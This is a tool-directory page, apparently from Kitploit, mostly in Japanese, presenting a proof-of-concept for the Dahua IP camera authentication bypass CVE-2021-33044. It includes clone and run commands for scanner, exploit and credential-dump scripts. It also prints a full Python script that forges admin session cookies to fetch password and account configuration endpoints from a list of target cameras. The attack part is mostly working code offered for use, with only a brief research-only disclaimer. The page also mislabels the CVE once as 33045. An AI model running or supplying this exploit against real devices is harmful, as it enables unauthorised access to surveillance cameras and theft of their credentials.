Skip to content
KitploitKITPLOIT
ツールブログ
提出
ツールブログ
提出

ハッキング、侵入テスト、サイバーセキュリティツールをあなたのセキュリティアーセナルに!

Kitploitはハッキング、サイバーセキュリティ、ペネトレーションテストのツールディレクトリです。最新のプロジェクトアップデートを見つけて、脆弱性の発見、システム分析、テストの自動化、セキュリティの強化を行いましょう。

··フィード·お問い合わせ·プライバシー·© 2026 Kitploit

ツールディレクトリ

カテゴリ

すべてのカテゴリを見る
Loading categories
ツール/GitHubGitHub/litndat/camera-dahua-research-l-h-ng-cve-2021-33044
認証と認可IoTセキュリティ脆弱性分析エクスプロイトウェブアプリケーション悪用ペネトレーションテスト学習と教育レッドチーミング

人気

すべて見る →

コミュニティで最も使われているツールを見つけましょう。

すべてのツールを探索

ツールコレクションを閲覧

すべてのツールを見る →
共有
GitHub
litndat/camera-dahua-research-l-h-ng-cve-2021-33044

Camera-Dahua-Research-l-h-ng-CVE-2021-33044

DAHUA_AUTH-BYPASS-CVE-2021-33044

リポジトリを見る
92ヶ月前未レビュー

Dahua Authentication Bypass PoCエクスプロイトシミュレーション (CVE-2021-33044)

概要

Dahua IPカメラは、セキュリティ監視システムで広く使用されているIoTデバイスです。社内ネットワークやインターネット経由で頻繁に展開されるため、IPカメラのセキュリティ脆弱性はプライバシーと情報セキュリティに深刻な影響を与える可能性があります。

CVE-2021-33045は、一部のDahuaカメラに存在するセキュリティ脆弱性で、適切な認証なしに内部設定リソースへの不正アクセスを可能にします。この脆弱性は、デバイスのファームウェアにおけるアクセス制御メカニズムの不備に起因します。

脆弱性情報

項目内容
CVECVE-2021-33044
種別Authentication Bypass
深刻度Critical (CVSS ~9.8)
認証認証不要
影響Dahua Camera / DVR / NVR

原因

この脆弱性は、Dahuaカメラのファームウェアにおける安全でない認証設計に起因します:

  • サーバーがセッション/トークンを正しく検証しない
  • クライアントから送信されたデータを信頼する
  • 一部の機密設定エンドポイントは、Cookieの存在のみをチェックし、実際のアクセス権限を検証しない

これにより、攻撃者は以下が可能になります:

  • 認証プロセスの偽装
  • ログインの完全なバイパス

参考:

  • NVD CVE-2021-33044
  • http://seclists.org/fulldisclosure/2021/Oct/13

認証バイパスメカニズムの動作方法

通常のフロー

root@kitploit:~
→ Client gửi HTTP request kèm cookie tùy ý
→ Camera kiểm tra cookie ở mức giao diện
→ Không xác minh session hợp lệ ở backend
→ Cho phép truy cập trực tiếp vào các endpoint cấu hình nội bộ
→ Trả về dữ liệu nhạy cảm

シナリオ

ファイル目的CVEs

使用方法

インストール

root@kitploit:~
# Clone repository
git clone https://github.com/eagle-nett/DAHUA_AUTH-BYPASS-CVE-2021-33044.git
cd DAHUA_AUTH-BYPASS-CVE-2021-33044

pip install requests

ネットワークスキャン

root@kitploit:~
# Scan subnet (ports required)
python dahua_scanner.py https://example.com -p 80 8080 8800

# Single host with port
python dahua_scanner.py https://example.com

Common Dahua ports: 80,443, 8080, 37777, 37778

CVE脆弱性の悪用

root@kitploit:~
python dahua_exploit.py https://example.com -p 8081
python dahua_exploit.py https://example.com -c 2021-33044  #CVE
python dahua_exploit.py --help

認証バイパス

root@kitploit:~
python dahua_auth_bypass.py https://example.com -p 8080
python dahua_auth_bypass.py https://example.com  # Dump thiết bị sau khi bypass

例

root@kitploit:~
#!/usr/bin/env python3
import requests, sys
requests.packages.urllib3.disable_warnings()

def dump_accounts(ip, port=80):
    base = f"http://{ip}:{port}"
    cookies = {
        "userName": "admin",
        "userLevel": "1",
        "sessionID": "00000000"
    }
    urls = [
        "/current_config/passwd",
        "/current_config/Account1",
        "/current_config/UserMgr",
        "/current_config/accounts"
    ]

    for path in urls:
        try:
            r = requests.get(
                base + path,
                cookies=cookies,
                verify=False,
                timeout=8
            )
            if r.status_code == 200 and len(r.text) > 30:
                print(f"[+] {ip}:{port}  VULNERABLE → {path}")
                return
        except:
            pass

    print(f"[-] {ip}:{port}  safe / patched")

for line in open("targets.txt"):
    t = line.strip()
    if not t or t.startswith("#"):
        continue
    ip = t.split(":")[0]
    port = int(t.split(":")[1]) if ":" in t else 80
    dump_accounts(ip, port)

解説

  • スクリプトは requests ライブラリを使用し、SSL警告を無効化しています(SSL警告を抑止するため)。

  • dump_accounts(ip, port=80) 関数は、カメラデバイスを検査する主要な関数です。 この関数の主な機能は次のとおりです:

    • IPアドレスとポートからURLを構築
    • Cookieによる管理者ログイン状態のシミュレート
    • 機密設定エンドポイントへのリクエスト送信
    • 応答を分析して影響を受けるデバイスかどうかを判定
  • 認証Cookieのシミュレーション。この関数は以下のCookie値を使用します:

    • userName=admin
    • userLevel=1
    • sessionID=00000000
  • 影響を受けるカメラのバージョンでは、バックエンドが実際のsessionIDを検証しないため、リクエストが正当な管理者アカウントから送信されたものとしてシステムが信頼します。

ターゲットリスト処理ループ

スクリプトは入力ファイルからターゲットのリストを読み取り、各デバイスに対して検査関数を順番に呼び出します。このアプローチにより、複数のカメラを自動的に評価できます。

image

開発プロセス

これらのスクリプトは以下に基づいて開発されています:

  • NVDから公開されたCVE詳細
  • Dahuaのセキュリティ通知
  • 公開されているPoCリファレンス(seclists.org、packetstormsecurity)

テスト状況:

  • 認証バイパスロジックはCVE仕様に従って実装済み
  • 脆弱なデバイスでの限定的なテストを実施。

注意

このプロジェクトは:

  • 学習および研究目的のみに使用
  • 個人のラボ環境で実行してください
ツールをダウンロード
dahua_scanner.pyネットワーク探索 — サブネット上のDahuaカメラを検出検出
dahua_exploit.pyMulti-CVEスキャンツール — すべてのセキュリティ脆弱性をチェック。すべて
dahua_auth_bypass.py--dump オプション付きの専用認証バイパスCVE-2021-33044